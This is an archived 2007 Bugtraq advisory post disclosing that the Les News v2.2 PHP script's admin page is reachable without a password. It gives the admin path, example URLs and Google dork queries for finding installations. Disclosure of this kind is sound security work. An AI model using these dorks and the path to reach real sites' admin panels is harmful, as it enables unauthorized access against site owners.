lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070204003313.12076.qmail@securityfocus.com> Date: 4 Feb 2007 00:33:13 -0000 From: sn0oPy.team@...il.com To: bugtraq@...urityfocus.com Subject: Les News v2.2 [Admin news without password] * Les News v2.2 [Admin news without password] * By : sn0oPy * Risk : verry high * site : http://stombi.free.fr/ * exploit : add to the /lesnews/ rep adminews/index_fr.php3 exemple : http://www.test.ma/lesnews/lesnews_fr.php3 http://www.test.ma/lesnews/adminews/index_fr.php3 Dork : inurl:"/lesnews/lesnews_fr.php3" inurl:"/lesnews/lesnews_en.php3" inurl:"/lesnews/lesnews_de.php3" inurl:"/lesnews/lesnews_it.php3" * contact : sn0oPy@...nir-geopolitique.net * greetz : [subzero], http://forums.avenir-geopolitique.net. reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2622